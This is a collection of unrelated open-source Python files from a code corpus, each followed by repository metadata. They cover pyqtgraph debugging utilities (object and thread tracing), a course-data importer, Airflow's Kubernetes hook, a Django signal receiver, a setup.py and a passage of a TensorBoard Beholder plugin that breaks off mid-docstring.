_getr(tl, olist, first=False)
i += 1
# The public function.
def get_all_objects():
"""Return a list of all live Python objects (excluding int and long), not including the list itself."""
gc.collect()
gcl = gc.get_objects()
olist = {}
_getr(gcl, olist)
del olist[id(olist)]
del olist[id(gcl)]
del olist[id(sys._getframe())]
return olist
def lookup(oid, objects=None):
"""Return an object given its ID, if it exists."""
if objects is None:
objects = get_all_objects()
return objects[oid]
class ObjTracker(object):
"""
Tracks all objects under the sun, reporting the changes between snapshots: what objects are created, deleted, and persistent.
This class is very useful for tracking memory leaks. The class goes to great (but not heroic) lengths to avoid tracking
its own internal objects.
Example:
ot = ObjTracker() # takes snapshot of currently existing objects
... do stuff ...
ot.diff() # prints lists of objects created and deleted since ot was initialized
... do stuff ...
ot.diff() # prints lists of objects created and deleted since last call to ot.diff()
# also prints list of items that were created since initialization AND have not been deleted yet
# (if done correctly, this list can tell you about objects that were leaked)
arrays = ot.findPersistent('ndarray') ## returns all objects matching 'ndarray' (string match, not instance checking)
## that were considered persistent when the last diff() was run
describeObj(arrays[0]) ## See if we can determine who has references to this array
"""
allObjs = {} ## keep track of all objects created and stored within class instances
allObjs[id(allObjs)] = None
def __init__(self):
self.startRefs = {} ## list of objects that exist when the tracker is initialized {oid: weakref}
## (If it is not possible to weakref the object, then the value is None)
self.startCount = {}
self.newRefs = {} ## list of objects that have been created since initialization
self.persistentRefs = {} ## list of objects considered 'persistent' when the last diff() was called
self.objTypes = {}
ObjTracker.allObjs[id(self)] = None
self.objs = [self.__dict__, self.startRefs, self.startCount, self.newRefs, self.persistentRefs, self.objTypes]
self.objs.append(self.objs)
for v in self.objs:
ObjTracker.allObjs[id(v)] = None
self.start()
def findNew(self, regex):
"""Return all objects matching regex that were considered 'new' when the last diff() was run."""
return self.findTypes(self.newRefs, regex)
def findPersistent(self, regex):
"""Return all objects matching regex that were considered 'persistent' when the last diff() was run."""
return self.findTypes(self.persistentRefs, regex)
def start(self):
"""
Remember the current set of objects as the comparison for all future calls to diff()
Called automatically on init, but can be called manually as well.
"""
refs, count, objs = self.collect()
for r in self.startRefs:
self.forgetRef(self.startRefs[r])
self.startRefs.clear()
self.startRefs.update(refs)
for r in refs:
self.rememberRef(r)
self.startCount.clear()
self.startCount.update(count)
#self.newRefs.clear()
#self.newRefs.update(refs)
def diff(self, **kargs):
"""
Compute all differences between the current object set and the reference set.
Print a set of reports for created, deleted, and persistent objects
"""
refs, count, objs = self.collect() ## refs contains the list of ALL objects
## Which refs have disappeared since call to start() (these are only displayed once, then forgotten.)
delRefs = {}
for i in list(self.startRefs.keys()):
if i not in refs:
delRefs[i] = self.startRefs[i]
del self.startRefs[i]
self.forgetRef(delRefs[i])
for i in list(self.newRefs.keys()):
if i not in refs:
delRefs[i] = self.newRefs[i]
del self.newRefs[i]
self.forgetRef(delRefs[i])
#print "deleted:", len(delRefs)
## Which refs have appeared since call to start() or diff()
persistentRefs = {} ## created since start(), but before last diff()
createRefs = {} ## created since last diff()
for o in refs:
if o not in self.startRefs:
if o not in self.newRefs:
createRefs[o] = refs[o] ## object has been created since last diff()
else:
persistentRefs[o] = refs[o] ## object has been created since start(), but before last diff() (persistent)
#print "new:", len(newRefs)
## self.newRefs holds the entire set of objects created since start()
for r in self.newRefs:
self.forgetRef(self.newRefs[r])
self.newRefs.clear()
self.newRefs.update(persistentRefs)
self.newRefs.update(createRefs)
for r in self.newRefs:
self.rememberRef(self.newRefs[r])
#print "created:", len(createRefs)
## self.persistentRefs holds all objects considered persistent.
self.persistentRefs.clear()
self.persistentRefs.update(persistentRefs)
print("----------- Count changes since start: ----------")
c1 = count.copy()
for k in self.startCount:
c1[k] = c1.get(k, 0) - self.startCount[k]
typs = list(c1.keys())
typs.sort(key=lambda a: c1[a])
for t in typs:
if c1[t] == 0:
continue
num = "%d" % c1[t]
print(" " + num + " "*(10-len(num)) + str(t))
print("----------- %d Deleted since last diff: ------------" % len(delRefs))
self.report(delRefs, objs, **kargs)
print("----------- %d Created since last diff: ------------" % len(createRefs))
self.report(createRefs, objs, **kargs)
print("----------- %d Created since start (persistent): ------------" % len(persistentRefs))
self.report(persistentRefs, objs, **kargs)
def __del__(self):
self.startRefs.clear()
self.startCount.clear()
self.newRefs.clear()
self.persistentRefs.clear()
del ObjTracker.allObjs[id(self)]
for v in self.objs:
del ObjTracker.allObjs[id(v)]
@classmethod
def isObjVar(cls, o):
return type(o) is cls or id(o) in cls.allObjs
def collect(self):
print("Collecting list of all objects...")
gc.collect()
objs = get_all_objects()
frame = sys._getframe()
del objs[id(frame)] ## ignore the current frame
del objs[id(frame.f_code)]
ignoreTypes = [int]
refs = {}
count = {}
for k in objs:
o = objs[k]
typ = type(o)
oid = id(o)
if ObjTracker.isObjVar(o) or typ in ignoreTypes:
continue
try:
                ref = weakref.ref(o)
except:
ref = None
refs[oid] = ref
typ = type(o)
typStr = typeStr(o)
self.objTypes[oid] = typStr
ObjTracker.allObjs[id(typStr)] = None
count[typ] = count.get(typ, 0) + 1
print("All objects: %d Tracked objects: %d" % (len(objs), len(refs)))
return refs, count, objs
def forgetRef(self, ref):
if ref is not None:
del ObjTracker.allObjs[id(ref)]
def rememberRef(self, ref):
## Record the address of the weakref object so it is not included in future object counts.
if ref is not None:
ObjTracker.allObjs[id(ref)] = None
def lookup(self, oid, ref, objs=None):
if ref is None or ref() is None:
try:
obj = lookup(oid, objects=objs)
except:
obj = None
else:
obj = ref()
return obj
def report(self, refs, allobjs=None, showIDs=False):
if allobjs is None:
allobjs = get_all_objects()
count = {}
rev = {}
for oid in refs:
obj = self.lookup(oid, refs[oid], allobjs)
if obj is None:
typ = "[del] " + self.objTypes[oid]
else:
typ = typeStr(obj)
if typ not in rev:
rev[typ] = []
rev[typ].append(oid)
c = count.get(typ, [0,0])
count[typ] = [c[0]+1, c[1]+objectSize(obj)]
typs = list(count.keys())
typs.sort(key=lambda a: count[a][1])
for t in typs:
line = " %d\t%d\t%s" % (count[t][0], count[t][1], t)
if showIDs:
line += "\t"+",".join(map(str,rev[t]))
print(line)
def findTypes(self, refs, regex):
allObjs = get_all_objects()
ids = {}
objs = []
r = re.compile(regex)
for k in refs:
if r.search(self.objTypes[k]):
objs.append(self.lookup(k, refs[k], allObjs))
return objs
def describeObj(obj, depth=4, path=None, ignore=None):
"""
Trace all reference paths backward, printing a list of different ways this object can be accessed.
Attempts to answer the question "who has a reference to this object"
"""
if path is None:
path = [obj]
if ignore is None:
ignore = {} ## holds IDs of objects used within the function.
ignore[id(sys._getframe())] = None
ignore[id(path)] = None
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
printed=False
for ref in refs:
if id(ref) in ignore:
continue
if id(ref) in list(map(id, path)):
print("Cyclic reference: " + refPathString([ref]+path))
printed = True
continue
newPath = [ref]+path
if len(newPath) >= depth:
refStr = refPathString(newPath)
if '[_]' not in refStr: ## ignore '_' references generated by the interactive shell
print(refStr)
printed = True
else:
describeObj(ref, depth, newPath, ignore)
printed = True
if not printed:
print("Dead end: " + refPathString(path))
def typeStr(obj):
"""Create a more useful type string by making <instance> types report their class."""
typ = type(obj)
if typ == getattr(types, 'InstanceType', None):
return "<instance of %s>" % obj.__class__.__name__
else:
return str(typ)
def searchRefs(obj, *args):
"""Pseudo-interactive function for tracing references backward.
**Arguments:**
obj: The initial object from which to start searching
args: A set of string or int arguments.
each integer selects one of obj's referrers to be the new 'obj'
each string indicates an action to take on the current 'obj':
t: print the types of obj's referrers
l: print the lengths of obj's referrers (if they have __len__)
i: print the IDs of obj's referrers
o: print obj
ro: return obj
rr: return list of obj's referrers
Examples::
searchRefs(obj, 't') ## Print types of all objects referring to obj
searchRefs(obj, 't', 0, 't') ## ..then select the first referrer and print the types of its referrers
searchRefs(obj, 't', 0, 't', 'l') ## ..also print lengths of the last set of referrers
searchRefs(obj, 0, 1, 'ro') ## Select index 0 from obj's referrer, then select index 1 from the next set of referrers, then return that object
"""
ignore = {id(sys._getframe()): None}
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
refs = [r for r in refs if id(r) not in ignore]
for a in args:
#fo = allFrameObjs()
#refs = [r for r in refs if r not in fo]
if type(a) is int:
obj = refs[a]
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
refs = [r for r in refs if id(r) not in ignore]
elif a == 't':
print(list(map(typeStr, refs)))
elif a == 'i':
print(list(map(id, refs)))
elif a == 'l':
def slen(o):
if hasattr(o, '__len__'):
return len(o)
else:
return None
print(list(map(slen, refs)))
elif a == 'o':
print(obj)
elif a == 'ro':
return obj
elif a == 'rr':
return refs
def allFrameObjs():
"""Return list of frame objects in current stack. Useful if you want to ignore these objects in refernece searches"""
f = sys._getframe()
objs = []
while f is not None:
objs.append(f)
objs.append(f.f_code)
#objs.append(f.f_locals)
#objs.append(f.f_globals)
#objs.append(f.f_builtins)
f = f.f_back
return objs
def findObj(regex):
"""Return a list of objects whose typeStr matches regex"""
allObjs = get_all_objects()
objs = []
r = re.compile(regex)
for i in allObjs:
obj = allObjs[i]
if r.search(typeStr(obj)):
objs.append(obj)
return objs
def listRedundantModules():
"""List modules that have been imported more than once via different paths."""
mods = {}
for name, mod in sys.modules.items():
if not hasattr(mod, '__file__'):
continue
mfile = os.path.abspath(mod.__file__)
if mfile[-1] == 'c':
mfile = mfile[:-1]
if mfile in mods:
print("module at %s has 2 names: %s, %s" % (mfile, name, mods[mfile]))
else:
mods[mfile] = name
def walkQObjectTree(obj, counts=None, verbose=False, depth=0):
"""
Walk through a tree of QObjects, doing nothing to them.
The purpose of this function is to find dead objects and generate a crash
immediately rather than stumbling upon them later.
Prints a count of the objects encountered, for fun. (or is it?)
"""
if verbose:
print(" "*depth + typeStr(obj))
report = False
if counts is None:
counts = {}
report = True
typ = str(type(obj))
try:
counts[typ] += 1
except KeyError:
counts[typ] = 1
for child in obj.children():
walkQObjectTree(child, counts, verbose, depth+1)
return counts
QObjCache = {}
def qObjectReport(verbose=False):
"""Generate a report counting all QObjects and their types"""
    global QObjCache
count = {}
for obj in findObj('PyQt'):
if isinstance(obj, QtCore.QObject):
oid = id(obj)
if oid not in QObjCache:
QObjCache[oid] = typeStr(obj) + " " + obj.objectName()
try:
QObjCache[oid] += " " + obj.parent().objectName()
QObjCache[oid] += " " + obj.text()
except:
pass
print("check obj", oid, str(QObjCache[oid]))
if obj.parent() is None:
walkQObjectTree(obj, count, verbose)
typs = list(count.keys())
typs.sort()
for t in typs:
print(count[t], "\t", t)
class PrintDetector(object):
"""Find code locations that print to stdout."""
def __init__(self):
self.stdout = sys.stdout
sys.stdout = self
def remove(self):
sys.stdout = self.stdout
def __del__(self):
self.remove()
def write(self, x):
self.stdout.write(x)
traceback.print_stack()
def flush(self):
self.stdout.flush()
def listQThreads():
"""Prints Thread IDs (Qt's, not OS's) for all QThreads."""
thr = findObj('[Tt]hread')
thr = [t for t in thr if isinstance(t, QtCore.QThread)]
import sip
for t in thr:
print("--> ", t)
print(" Qt ID: 0x%x" % sip.unwrapinstance(t))
def pretty(data, indent=''):
"""Format nested dict/list/tuple structures into a more human-readable string
This function is a bit better than pprint for displaying OrderedDicts.
"""
ret = ""
ind2 = indent + " "
if isinstance(data, dict):
ret = indent+"{\n"
for k, v in data.items():
ret += ind2 + repr(k) + ": " + pretty(v, ind2).strip() + "\n"
ret += indent+"}\n"
elif isinstance(data, list) or isinstance(data, tuple):
s = repr(data)
if len(s) < 40:
ret += indent + s
else:
if isinstance(data, list):
d = '[]'
else:
d = '()'
ret = indent+d[0]+"\n"
for i, v in enumerate(data):
ret += ind2 + str(i) + ": " + pretty(v, ind2).strip() + "\n"
ret += indent+d[1]+"\n"
else:
ret += indent + repr(data)
return ret
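# Hedged usage sketch for pretty(); the sample structure below is arbitrary.
def _pretty_usage_example():
    sample = {'size': (640, 480), 'channels': ['r', 'g', 'b'], 'meta': {'fps': 30}}
    print(pretty(sample))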
class ThreadTrace(object):
"""
Used to debug freezing by starting a new thread that reports on the
location of other threads periodically.
"""
def __init__(self, interval=10.0):
self.interval = interval
self.lock = Mutex()
self._stop = False
self.start()
def stop(self):
with self.lock:
self._stop = True
def start(self, interval=None):
if interval is not None:
self.interval = interval
self._stop = False
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def run(self):
while True:
with self.lock:
if self._stop is True:
return
print("\n============= THREAD FRAMES: ================")
for id, frame in sys._current_frames().items():
if id == threading.current_thread().ident:
continue
# try to determine a thread name
try:
name = threading._active.get(id, None)
except:
name = None
if name is None:
try:
# QThread._names must be manually set by thread creators.
name = QtCore.QThread._names.get(id)
except:
name = None
if name is None:
name = "???"
print("<< thread %d \"%s\" >>" % (id, name))
traceback.print_stack(frame)
print("===============================================\n")
time.sleep(self.interval)
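# Hedged usage sketch for ThreadTrace; the interval and the sleep standing in for
# real work are arbitrary. Instantiation starts the reporter thread immediately.
def _thread_trace_usage_example():
    tracer = ThreadTrace(interval=5.0)   # dump all other threads' stacks every 5 s
    time.sleep(12)                       # ... the code being debugged runs here ...
    tracer.stop()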
class ThreadColor(object):
"""
Wrapper on stdout/stderr that colors text by the current thread ID.
*stream* must be 'stdout' or 'stderr'.
"""
colors = {}
lock = Mutex()
def __init__(self, stream):
self.stream = getattr(sys, stream)
self.err = stream == 'stderr'
setattr(sys, stream, self)
def write(self, msg):
with self.lock:
cprint.cprint(self.stream, self.color(), msg, -1, stderr=self.err)
def flush(self):
with self.lock:
self.stream.flush()
def color(self):
tid = threading.current_thread()
if tid not in self.colors:
c = (len(self.colors) % 15) + 1
self.colors[tid] = c
return self.colors[tid]
def enableFaulthandler():
""" Enable faulthandler for all threads.
If the faulthandler package is available, this function disables and then
re-enables fault handling for all threads (this is necessary to ensure any
new threads are handled correctly), and returns True.
If faulthandler is not available, then returns False.
"""
try:
import faulthandler
# necessary to disable first or else new threads may not be handled.
faulthandler.disable()
faulthandler.enable(all_threads=True)
return True
except ImportError:
return False
|
ArteliaTelemac/PostTelemac
|
PostTelemac/meshlayerlibs/pyqtgraph/debug.py
|
Python
|
gpl-3.0
| 41,232
| 0.00827
|
import datetime
import json
from classrank.database.wrapper import Query
"""add_to_database.py: adds courses from Grouch to the ClassRank DB."""
def add_to_database(grouch_output, db):
"""
Add courses from Grouch's output to a db.
Keyword arguments:
grouch_output -- the output of Grouch (the scraped info)
db -- the db to add to
"""
print("Beginning Grouch parse ({}).".format(datetime.datetime.now()))
all_courses = parse(grouch_output)
print("Ending Grouch parse ({}).".format(datetime.datetime.now()))
if len(all_courses) != 0:
print("Beginning database add ({}).".format(datetime.datetime.now()))
with Query(db) as q:
school_dict = {"name": "Georgia Institute of Technology",
"abbreviation": "gatech"}
if not _school_in_database(school_dict, db, q):
q.add(db.school(**school_dict))
school_id = q.query(db.school).filter_by(**school_dict).one().uid
for course, sections in all_courses:
course_dict = {"school_id": school_id,
"name": course['name'],
"description": course['fullname'],
"number": course['number'],
"subject": course['school']}
if not _course_in_database(course_dict, db, q):
q.add(db.course(**course_dict))
course_id = q.query(db.course).filter_by(**course_dict).one().uid
for section in sections:
section_dict = {"course_id": course_id,
"semester": course['semester'],
"year": course['year'],
"name": section['section_id'],
"crn": section['crn']}
q.add(db.section(**section_dict))
print("Ending database add ({}).".format(datetime.datetime.now()))
def parse(to_read):
"""Parse Grouch output (JSON) to dictionaries, with some additions.
Keyword arguments:
to_read -- the file of Grouch output (one JSON document per line)
Return a list of tuples of (course, sections_of_course).
"""
# A mapping of semester number to string name
semester_map = {'2': 'Spring',
'5': 'Summer',
'8': 'Fall'}
all_courses = []
with open(to_read, 'r') as f:
for line in f:
course = json.loads(line)
# Extract the semester and year for easier use later
semester_token = course['semester'] # of the form yyyymm
year = semester_token[0:4]
month = semester_token[5:6]
semester = semester_map[month]
course['year'] = year
course['semester'] = semester
sections = []
if 'sections' in course: # If the course has sections
sections = course['sections']
all_courses.append((course, sections))
return all_courses
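# Hedged sketch of the per-line JSON that parse() expects; only the keys this module
# actually reads are shown (real Grouch output may carry more fields), and all of
# the course values below are made up.
def _parse_example():
    import tempfile
    line = {"name": "CS 1301", "fullname": "Introduction to Computing",
            "number": "1301", "school": "CS", "semester": "201508",
            "sections": [{"section_id": "A", "crn": "12345"}]}
    with tempfile.NamedTemporaryFile('w', suffix='.jsonl', delete=False) as f:
        f.write(json.dumps(line) + "\n")
        path = f.name
    return parse(path)  # -> [(course with 'year'/'semester' rewritten, [section dicts])]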
def _school_in_database(school_dict, db, q):
"""Check if a school is in the database.
Keyword arguments:
school_dict -- a dictionary specifying the school to check
db -- the db to search in
q -- the Query object used to query the database
Returns True if there are instances of school in database, False otherwise
"""
return len(q.query(db.school).filter_by(**school_dict).all()) != 0
def _course_in_database(course_dict, db, q):
"""Check if a course is in the database.
Keyword arguments:
course_dict -- a dictionary specifying the course to check
db -- the db to search in
q -- the Query object used to query the database
Returns True if there are instances of course in database, False otherwise
"""
return len(q.query(db.course).filter_by(**course_dict).all()) != 0
|
classrank/ClassRank
|
classrank/grouch/grouch_util.py
|
Python
|
gpl-2.0
| 3,951
| 0.000253
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tempfile
from typing import Any, Dict, Generator, Optional, Tuple, Union
import yaml
from cached_property import cached_property
from kubernetes import client, config, watch
from airflow.exceptions import AirflowException
from airflow.hooks.base import BaseHook
def _load_body_to_dict(body):
try:
body_dict = yaml.safe_load(body)
except yaml.YAMLError as e:
raise AirflowException("Exception when loading resource definition: %s\n" % e)
return body_dict
class KubernetesHook(BaseHook):
"""
Creates Kubernetes API connection.
    - use in-cluster configuration by setting ``extra__kubernetes__in_cluster`` in the connection
    - use a custom config file by providing its path via ``extra__kubernetes__kube_config_path``
    - use a custom configuration by providing the content of a kubeconfig file via
      ``extra__kubernetes__kube_config`` in the connection
    - use the default config by providing no extras
    This hook checks for the configuration options in the above order. Once an option is present,
    it is the one used.
.. seealso::
For more information about Kubernetes connection:
:doc:`/connections/kubernetes`
:param conn_id: the connection to Kubernetes cluster
:type conn_id: str
"""
conn_name_attr = 'kubernetes_conn_id'
default_conn_name = 'kubernetes_default'
conn_type = 'kubernetes'
hook_name = 'Kubernetes Cluster Connection'
@staticmethod
def get_connection_form_widgets() -> Dict[str, Any]:
"""Returns connection widgets to add to connection form"""
from flask_appbuilder.fieldwidgets import BS3TextFieldWidget
from flask_babel import lazy_gettext
from wtforms import BooleanField, StringField
return {
"extra__kubernetes__in_cluster": BooleanField(lazy_gettext('In cluster configuration')),
"extra__kubernetes__kube_config_path": StringField(
lazy_gettext('Kube config path'), widget=BS3TextFieldWidget()
),
"extra__kubernetes__kube_config": StringField(
lazy_gettext('Kube config (JSON format)'), widget=BS3TextFieldWidget()
),
"extra__kubernetes__namespace": StringField(
lazy_gettext('Namespace'), widget=BS3TextFieldWidget()
),
}
@staticmethod
def get_ui_field_behaviour() -> Dict:
"""Returns custom field behaviour"""
return {
"hidden_fields": ['host', 'schema', 'login', 'password', 'port', 'extra'],
"relabeling": {},
}
def __init__(
self, conn_id: str = default_conn_name, client_configuration: Optional[client.Configuration] = None
) -> None:
super().__init__()
self.conn_id = conn_id
self.client_configuration = client_configuration
def get_conn(self) -> Any:
"""Returns kubernetes api session for use with requests"""
connection = self.get_connection(self.conn_id)
extras = connection.extra_dejson
in_cluster = extras.get("extra__kubernetes__in_cluster")
kubeconfig_path = extras.get("extra__kubernetes__kube_config_path")
kubeconfig = extras.get("extra__kubernetes__kube_config")
num_selected_configuration = len([o for o in [in_cluster, kubeconfig, kubeconfig_path] if o])
if num_selected_configuration > 1:
raise AirflowException(
"Invalid connection configuration. Options extra__kubernetes__kube_config_path, "
"extra__kubernetes__kube_config, extra__kubernetes__in_cluster are mutually exclusive. "
"You can only use one option at a time."
)
if in_cluster:
self.log.debug("loading kube_config from: in_cluster configuration")
config.load_incluster_config()
return client.ApiClient()
if kubeconfig_path is not None:
self.log.debug("loading kube_config from: %s", kubeconfig_path)
config.load_kube_config(
config_file=kubeconfig_path, client_configuration=self.client_configuration
)
return client.ApiClient()
if kubeconfig is not None:
with tempfile.NamedTemporaryFile() as temp_config:
self.log.debug("loading kube_config from: connection kube_config")
temp_config.write(kubeconfig.encode())
temp_config.flush()
config.load_kube_config(
config_file=temp_config.name, client_configuration=self.client_configuration
)
return client.ApiClient()
self.log.debug("loading kube_config from: default file")
config.load_kube_config(client_configuration=self.client_configuration)
return client.ApiClient()
@cached_property
def api_client(self) -> Any:
"""Cached Kubernetes API client"""
return self.get_conn()
def create_custom_object(
self, group: str, version: str, plural: str, body: Union[str, dict], namespace: Optional[str] = None
):
"""
Creates custom resource definition object in Kubernetes
:param group: api group
:type group: str
:param version: api version
:type version: str
:param plural: api plural
:type plural: str
:param body: crd object definition
:type body: Union[str, dict]
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CustomObjectsApi(self.api_client)
if namespace is None:
namespace = self.get_namespace()
if isinstance(body, str):
body = _load_body_to_dict(body)
try:
response = api.create_namespaced_custom_object(
group=group, version=version, namespace=namespace, plural=plural, body=body
)
self.log.debug("Response: %s", response)
return response
except client.rest.ApiException as e:
raise AirflowException("Exception when calling -> create_custom_object: %s\n" % e)
def get_custom_object(
self, group: str, version: str, plural: str, name: str, namespace: Optional[str] = None
):
"""
Get custom resource definition object from Kubernetes
:param group: api group
:type group: str
:param version: api version
:type version: str
:param plural: api plural
:type plural: str
:param name: crd object name
:type name: str
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CustomObjectsApi(self.api_client)
if namespace is None:
namespace = self.get_namespace()
try:
response = api.get_namespaced_custom_object(
group=group, version=version, namespace=namespace, plural=plural, name=name
)
return response
except client.rest.ApiException as e:
raise AirflowException("Exception when calling -> get_custom_object: %s\n" % e)
def get_namespace(self) -> str:
"""Returns the namespace that defined in the connection"""
connection = self.get_connection(self.conn_id)
extras = connection.extra_dejson
namespace = extras.get("extra__kubernetes__namespace", "default")
return namespace
def get_pod_log_stream(
self,
pod_name: str,
container: Optional[str] = "",
namespace: Optional[str] = None,
) -> Tuple[watch.Watch, Generator[str, None, None]]:
"""
Retrieves a log stream for a container in a kubernetes pod.
:param pod_name: pod name
:type pod_name: str
:param container: container name
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CoreV1Api(self.api_client)
watcher = watch.Watch()
return (
watcher,
watcher.stream(
api.read_namespaced_pod_log,
name=pod_name,
container=container,
namespace=namespace if namespace else self.get_namespace(),
),
)
def get_pod_logs(
self,
pod_name: str,
container: Optional[str] = "",
namespace: Optional[str] = None,
):
"""
Retrieves a container's log from the specified pod.
:param pod_name: pod name
:type pod_name: str
:param container: container name
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CoreV1Api(self.api_client)
return api.read_namespaced_pod_log(
name=pod_name,
container=container,
_preload_content=False,
namespace=namespace if namespace else self.get_namespace(),
)
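# Hedged usage sketch; the connection id, CRD coordinates and pod name below are
# hypothetical, and an Airflow connection of type "kubernetes" must already exist.
def _kubernetes_hook_usage_example():
    hook = KubernetesHook(conn_id="kubernetes_default")
    hook.create_custom_object(
        group="example.com",
        version="v1",
        plural="widgets",
        body={"apiVersion": "example.com/v1", "kind": "Widget",
              "metadata": {"name": "demo"}, "spec": {}},
    )
    return hook.get_pod_logs("demo-pod", namespace="default")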
|
airbnb/airflow
|
airflow/providers/cncf/kubernetes/hooks/kubernetes.py
|
Python
|
apache-2.0
| 9,757
| 0.002152
|
"""
Handling signals of the `core` app
"""
from django.dispatch import receiver
from core import signals
from reader import actions
@receiver(signals.app_link_ready)
def app_link_ready(sender, **kwargs):
actions.create_app_link()
|
signaldetect/messity
|
reader/receivers/core.py
|
Python
|
mit
| 238
| 0
|
from setuptools import setup
setup(
name="agentarchives",
description="Clients to retrieve, add, and modify records from archival management systems",
url="https://github.com/artefactual-labs/agentarchives",
author="Artefactual Systems",
author_email="info@artefactual.com",
license="AGPL 3",
version="0.7.0",
packages=[
"agentarchives",
"agentarchives.archivesspace",
"agentarchives.archivists_toolkit",
"agentarchives.atom",
],
install_requires=["requests>=2,<3", "mysqlclient>=1.3,<2"],
python_requires=">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*",
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: GNU Affero General Public License v3",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
)
|
artefactual-labs/agentarchives
|
setup.py
|
Python
|
agpl-3.0
| 1,074
| 0.000931
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from ..proto.summary_pb2 import Summary
from ..proto.summary_pb2 import SummaryMetadata
from ..proto.tensor_pb2 import TensorProto
from ..proto.tensor_shape_pb2 import TensorShapeProto
import os
import time
import numpy as np
# import tensorflow as tf
# from tensorboard.plugins.beholder import im_util
# from . import im_util
from .file_system_tools import read_pickle,\
write_pickle, write_file
from .shared_config import PLUGIN_NAME, TAG_NAME,\
SUMMARY_FILENAME, DEFAULT_CONFIG, CONFIG_FILENAME, SUMMARY_COLLECTION_KEY_NAME, SECTION_INFO_FILENAME
from . import video_writing
# from .visualizer import Visualizer
class Beholder(object):
def __init__(self, logdir):
self.PLUGIN_LOGDIR = logdir + '/plugins/' + PLUGIN_NAME
self.is_recording = False
self.video_writer = video_writing.VideoWriter(
self.PLUGIN_LOGDIR,
outputs=[video_writing.FFmpegVideoOutput, video_writing.PNGVideoOutput])
self.last_image_shape = []
self.last_update_time = time.time()
self.config_last_modified_time = -1
self.previous_config = dict(DEFAULT_CONFIG)
if not os.path.exists(self.PLUGIN_LOGDIR + '/config.pkl'):
os.makedirs(self.PLUGIN_LOGDIR)
write_pickle(DEFAULT_CONFIG,
'{}/{}'.format(self.PLUGIN_LOGDIR, CONFIG_FILENAME))
# self.visualizer = Visualizer(self.PLUGIN_LOGDIR)
def _get_config(self):
'''Reads the config file from disk or creates a new one.'''
filename = '{}/{}'.format(self.PLUGIN_LOGDIR, CONFIG_FILENAME)
modified_time = os.path.getmtime(filename)
if modified_time != self.config_last_modified_time:
config = read_pickle(filename, default=self.previous_config)
self.previous_config = config
else:
config = self.previous_config
self.config_last_modified_time = modified_time
return config
def _write_summary(self, frame):
'''Writes the frame to disk as a tensor summary.'''
path = '{}/{}'.format(self.PLUGIN_LOGDIR, SUMMARY_FILENAME)
smd = SummaryMetadata()
tensor = TensorProto(
dtype='DT_FLOAT',
float_val=frame.reshape(-1).tolist(),
tensor_shape=TensorShapeProto(
dim=[TensorShapeProto.Dim(size=frame.shape[0]),
TensorShapeProto.Dim(size=frame.shape[1]),
TensorShapeProto.Dim(size=frame.shape[2])]
)
)
summary = Summary(value=[Summary.Value(
tag=TAG_NAME, metadata=smd, tensor=tensor)]).SerializeToString()
write_file(summary, path)
@staticmethod
def stats(tensor_and_name):
imgstats = []
for (img, name) in tensor_and_name:
immax = img.max()
immin = img.min()
imgstats.append(
{
'height': img.shape[0],
'max': str(immax),
'mean': str(img.mean()),
'min': str(immin),
'name': name,
'range': str(immax - immin),
'shape': str((img.shape[1], img.shape[2]))
})
return imgstats
def _get_final_image(self, config, trainable=None, arrays=None, frame=None):
if config['values'] == 'frames':
# print('===frames===')
final_image = frame
elif config['values'] == 'arrays':
# print('===arrays===')
final_image = np.concatenate([arr for arr, _ in arrays])
stat = self.stats(arrays)
write_pickle(
stat, '{}/{}'.format(self.PLUGIN_LOGDIR, SECTION_INFO_FILENAME))
elif config['values'] == 'trainable_variables':
# print('===trainable===')
final_image = np.concatenate([arr for arr, _ in trainable])
stat = self.stats(trainable)
write_pickle(
stat, '{}/{}'.format(self.PLUGIN_LOGDIR, SECTION_INFO_FILENAME))
if len(final_image.shape) == 2: # Map grayscale images to 3D tensors.
final_image = np.expand_dims(final_image, -1)
return final_image
def _enough_time_has_passed(self, FPS):
'''For limiting how often frames are computed.'''
if FPS == 0:
return False
else:
earliest_time = self.last_update_time + (1.0 / FPS)
return time.time() >= earliest_time
def _update_frame(self, trainable, arrays, frame, config):
final_image = self._get_final_image(config, trainable, arrays, frame)
self._write_summary(final_image)
self.last_image_shape = final_image.shape
return final_image
def _update_recording(self, frame, config):
'''Adds a frame to the current video output.'''
# pylint: disable=redefined-variable-type
should_record = config['is_recording']
if should_record:
if not self.is_recording:
self.is_recording = True
                print('Starting recording using %s' %
self.video_writer.current_output().name())
self.video_writer.write_frame(frame)
elif self.is_recording:
self.is_recording = False
self.video_writer.finish()
print('Finished recording')
    # TODO: blanket try and except for production? I don't want someone's script to die
# after weeks of running because of a visualization.
def update(self, trainable=None, arrays=None, frame=None):
'''Creates a frame and writes it to disk.
Args:
trainable: a list of namedtuple (tensors, name).
arrays: a list of namedtuple (tensors, name).
